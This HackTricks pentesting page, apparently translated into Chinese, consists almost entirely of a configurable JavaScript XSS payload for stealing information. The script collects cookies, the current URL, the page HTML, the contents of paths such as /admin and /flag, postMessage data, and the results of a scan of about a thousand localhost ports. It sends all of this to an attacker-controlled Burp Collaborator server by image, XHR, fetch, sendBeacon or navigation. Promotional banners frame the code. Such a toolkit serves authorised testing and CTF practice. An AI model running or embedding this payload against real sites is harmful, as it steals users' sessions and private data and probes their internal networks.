hacktricks/pentesting-web/xss-cross-site-scripting/steal-info-js.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>
```javascript
// SELECT HERE THE EXFILTRATION MODE (more than 1 can be selected)
// If any GET method is selected (like location or RQ_GET), it's recommended to exfiltrate each info 1 by 1
var ATTACKER_SERVER = "https://weecosb5a2k7jc0cwlyksg9qzh57tw.burpcollaborator.net"
var EXFIL_BY_IMG = false
var EXFIL_BY_RQ_GET = false
var EXFIL_BY_RQ_POST = true
var EXFIL_BY_FETCH_GET = false
var EXFIL_BY_FETCH_POST = false
var EXFIL_BY_NAV = false

var EXFIL_BY_LOC = false
var ALL_INFO = "" // Only used by Location exfiltration


// Function to make the data possible to transmit via either GET or POST
function encode(text){
return encodeURI(btoa(text));
}

// Functions to exfiltrate the information
function exfil_info(info_name, text, is_final=false){
if (EXFIL_BY_IMG)               exfil_by_img(info_name, text);
if (EXFIL_BY_RQ_GET)            exfil_by_rq_get(info_name, text);
if (EXFIL_BY_RQ_POST)           exfil_by_rq_post(info_name, text);
if (EXFIL_BY_FETCH_GET)         exfil_by_fetch_get(info_name, text);
if (EXFIL_BY_FETCH_POST)        exfil_by_fetch_post(info_name, text);
if (EXFIL_BY_NAV)               exfil_by_nav(info_name, text);
if (EXFIL_BY_LOC){
if (is_final) exfil_by_loc(info_name, text);
else ALL_INFO += "\n\n" + info_name + "=" + text;
}
}

function exfil_by_img(info_name, text){
new Image().src = ATTACKER_SERVER + "/exfil_by_img/" + info_name + "?" + info_name + "=" + text
}

function exfil_by_rq_get(info_name, text){
var xhttp = new XMLHttpRequest();
xhttp.open("GET", ATTACKER_SERVER + "/exfil_by_rq_get/" + info_name + "?" + info_name + "=" + text, true);
xhttp.send();
}

function exfil_by_rq_post(info_name, text){
var xhttp = new XMLHttpRequest();
xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true);
xhttp.send(text);
}

function exfil_by_fetch_get(info_name, text){
fetch(ATTACKER_SERVER + "/exfil_by_fetch_get/" + info_name + "?" + info_name + "=" + text, {method: 'GET', mode: 'no-cors'});
}

function exfil_by_fetch_post(info_name, text){
fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {method: 'POST', mode: 'no-cors', body: text});
}

function exfil_by_nav(info_name, text){
navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text)
}

function exfil_by_loc(info_name, text){
document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO);
}


// Functions to get the data to exfiltrate
function exfil_page_content(url){
var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
exfil_info(url, encode(xhr.responseText));
}
}
xhr.open('GET', url, true);
xhr.send(null);
}

function exfil_internal_port(port){
fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => {
exfil_info("internal_port", encode(port));
});
}


// Info to exfiltrate
exfil_info("cookies", encode(document.cookie));
exfil_info("current_url", encode(document.URL));
exfil_info("current_content", encode(document.documentElement.innerHTML));
exfil_page_content("/");
exfil_page_content("/admin"); // If 404 nothing will be sent
exfil_page_content("/flag");
exfil_page_content("/flag.txt");
top_1000 = [1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191
```javascript
top_1000.forEach(port => exfil_internal_port(port));

if (EXFIL_BY_LOC){
setTimeout(exfil_info("完成", "完成", true), 5000) // 5秒后通过位置进行信息窃取
}

// 嗅探信息
window.onmessage = function(e){
exfil_info("onmessage", encode(e.data))
}
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>